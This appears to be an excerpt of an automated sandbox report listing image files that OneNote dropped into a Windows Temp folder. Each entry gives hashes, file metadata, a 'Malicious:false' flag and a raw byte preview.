                                                                                                                                                                                                                  SHA-512:BC7DC1201884E6DAFDC1F9D8E32656BFAEE0BB4905835E09B65299FE2D7C064B27EAA10B531F9BECF970C986E89A5FD8A0B83F508BBA34EB4E38B3F7F5FC623A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......(.....!..t....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................4.....bKGD....H....cmPPJCmp0712....H.s...#.IDATx^.w`......$..B....... ....fz5..6`l\.8...Nsz{.//y./....{.7}g.....e.....~.......s...f.....%c...6....O.PJ...Y.oi...9..'j.2..6.-

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{DDA7AE46-BBE1-415D-A668-2D4F831EAF89}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{DFB1B1AB-550F-44E2-A398-0BF8B4A0F71F}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11332
                                                                                                                                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{E087FEF5-6E32-4991-BB82-9A1EDD95EECC}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):567
                                                                                                                                                                                                                  Entropy (8bit):7.499095532051442
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:6v/7iQug6mbURgVowGtrjzeC/Gl2QL26YnQQNZTw61VeDp:PRgVqtrjSC/MJ26YQot3E
                                                                                                                                                                                                                  MD5:D055CE625528E448C61315EAAEF5BB71
                                                                                                                                                                                                                  SHA1:029DF4C872B1C154F32E7FE94F434547C3BA6192
                                                                                                                                                                                                                  SHA-256:85BF1E672B4E86E9AF0C7874681EC9620DFDC78E0335B83EEF38C17D813B6705
                                                                                                                                                                                                                  SHA-512:705B6B729E967FA946469571109AA892F5CB55A01C74D40AE02140D10CBF9B65DD5E511C06EBFE494E407742F8C6F4FBBE88664B78B37ABFB2F19DB1F66F4247
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR... ... .....szz.....sRGB.........pHYs..........o.d....IDATXG.V... ..7.^z....d},C...X.Zg.J..f..LA=1....9.9.....Oq.........Y..8.eYB.....y.-.....-..lh.ueM...:l..M.h..Z.d5..........e.Av....(..B...~..u.....Z6..x.[.p.x.{|..cb....J....j.O........{..[.DW..k..].m..%pD...<5..u...2....Y...F.B...............x.cb.....r.....c.HS..Dk....a.$v_a....2a....Up.....V.`.D+..B..t;FcBs..^......R.mT.).V;n.$.29..KM....Z..w.s'....@i@./..h..6..P.Z...a....2.....".z... @......P>..{.....3I.:P2..z{v&.B.....+.......G.>4.....}.#.m..9...|...a<!..d....IEND.B`.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{E1A08393-4ECB-47DD-B0A0-BCF06D42F6C6}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):52945
                                                                                                                                                                                                                  Entropy (8bit):7.6490972666456765
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
                                                                                                                                                                                                                  MD5:AD003F032F32FAC4672D4CE237FA5C5B
                                                                                                                                                                                                                  SHA1:AE234931B452F0D649D91291763B919CF350EA49
                                                                                                                                                                                                                  SHA-256:ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
                                                                                                                                                                                                                  SHA-512:ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k|...S..d.4.>.RW5z.$.i.)V.O....>o...c..*&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N*..|.4...80.#..e....t.J..ZQ.x|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{E1B4ED56-B1F5-492E-BB74-FFB619B54C1E}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1924
                                                                                                                                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{E228CF3F-116C-4573-B3BA-8FB5B503F70C}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11886
                                                                                                                                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{E43129EA-618C-4378-9318-E8DF8293F776}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16003
                                                                                                                                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{E54BCA7F-5382-4481-80CB-867C816AE250}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13084
                                                                                                                                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{E58F9233-1CB9-4869-8B5F-24BEA90243E6}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3679
                                                                                                                                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{E679063D-E1F7-411D-8D19-90E6B4871153}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):22634
                                                                                                                                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{E7782D65-36E3-49C7-8B0F-6410276F3827}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{E855DCC5-5EC5-40DA-B18C-89BEE0515A69}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5386
                                                                                                                                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                                  Malicious:false
